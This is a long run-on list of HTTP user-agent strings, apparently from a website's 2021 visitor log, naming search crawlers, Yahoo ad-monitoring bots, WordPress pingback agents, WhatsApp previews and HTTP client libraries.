Chrome/36.0.1979.0 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~galvanized-case-123515) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616780179-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210325.225530 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616771471-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616771474-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616771368-0 +Enigma BrowserEnigma Browser +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616771368-60 +WordPress/5.7; https://goodoboi.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616771369-10 +FAST-WebCrawler/7.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) +Mozilla/5.0 (compatible; Cloudflare-AMP/3.0; +https://amp.cloudflare.com/doc/fetcher.html) AppleWebKit/574.34 +WordPress/5.4.4; https://www.openradio.eu +Apache-HttpClient/4.5.5 (Java/11.0.10) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +WhatsApp/2.2110.10 N +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4461.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.7.6 A +WordPress/5.6.2; https://artech-networks.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.111 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; http://urpodderjka.ru +JavaX.X.X- la? +WordPress/5.7; https://wikitechzone.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616965911-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616965919-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616890938-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616899150-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616915660-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616917817-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616924171-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616924579-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616927765-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 +Python/3.9 aiohttp/3.7.4.post0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.112 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/89.0.4389.99 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616926788-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616926786-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616926786-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616926788-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.108 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617036382-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617045374-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616988581-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616988583-10 +yacybot (-global; aarch64 Linux 5.4.0-1032-raspi; java 14.0.2; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617059082-10 +WhatsApp/2.21.60.16 i +Tiny Tiny RSS/12.545 (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616997123-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617008319-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617023405-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617026430-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617048301-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617056032-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; https://spl32.ru +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210326.185243 +WordPress/5.6.2; https://rdpmate.com +WordPress/5.7; https://rdpmate.com +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.99 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Apache-HttpClient/4.5.9 (Java/11.0.7) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617066541-10 +WhatsApp/2.21.7.8 A +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.112 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617065480-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617072499-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617074947-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617114210-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617120378-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617120399-0 +WhatsApp/2.21.7.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617132615-0 +WhatsApp/2.21.6.17 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +FDM/6.14.0.3798 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.112 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.99 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; https://www.mrstransport.sk +WordPress/5.7; https://profitmonitoring.ru +yacybot (/global; amd64 Linux 4.15.0-140-generic; java 11.0.10; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617165428-0 +WordPress/5.6.2; http://xrds.ayz.pl/wikipedia +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617165430-10 +WordPress/5.7; https://sibweek.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617231263-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617231276-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617231277-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617231312-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617151106-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617152603-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617157912-0 +Mozilla/5.0 (X11; Linux x86_64; rv:85.0) adbeat.com/policy Gecko/20100101 Firefox/85.0 +WordPress/5.7; https://www.beatcameraa.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617215373-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617229494-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.117 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617233029-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210330.205833 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210330.205833 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617173154-0 +Mozilla/5.0 (compatible; XML Sitemaps Generator; www.xml-sitemaps.com) Gecko XML-Sitemaps/1.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617173153-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617236973-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617247646-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617250377-0 +okhttp/2.75 +WordPress/5.7; http://geopressa.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617236928-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617237275-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617236917-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617248350-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617241136-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617249719-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617250696-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617252360-0 +WhatsApp/2.21.7.10 A +yacybot (/global; amd64 Linux 4.4.240; java 15.0.1; US/en) http://yacy.net/bot.html +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.5.18 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Google-Shopping-Quality +http://www.google.com/merchants/tos/extend/UA/tos.html) +WordPress/5.7; http://geopressa.ru EWWW/603.0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617323227-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617331869-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617374645-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617374647-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617390223-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617390145-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617329326-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617350907-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617356994-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.120 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7; https://geopressa.ru +WordPress/5.4.2; https://thecxinsights.com +WordPress/5.7; https://geopressa.ru EWWW/610 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617403020-0 +WhatsApp/2.2110.12 N +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.0.733 (SpeedMode; Proxy; Android 4.2.2; R831K ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617403019-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.121 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.3.4; https://wind7activation.ru +Java/1.8.0_66-internal +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617456139-10 +WhatsApp/2.21.7.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617447612-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617451549-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617456137-0 +WhatsApp/2.21.7.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617473656-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617462825-0 +WhatsApp/2.20.201.18 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617462825-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617462824-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617462826-10 +WordPress/5.7; https://anhdungseo.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617562771-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617496664-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617497265-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1617502454-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617518860-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.81 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617549159-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617549206-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617578951-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617578984-0 +WordPress/5.7; http://geopressa.ru EWWW/610 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617537003-0 +WordPress/5.6.2; https://caloginguide.com +WordPress.com; http://caloginguide.com +WordPress.com; https://caloginguide.com +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617656921-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617656925-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617649409-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617587920-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617595743-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617610765-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617628809-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1617628810-0 +Microsoft-CryptoAPI/6.2 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/91.0.4463.0 Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/89.0.4389.112 Safari/537.36 +WordPress/5.7; https://2020.co.id +curl/7.76.0 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd__k4pTjC2mBAPtBtFBW6MvkgQrnQ) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 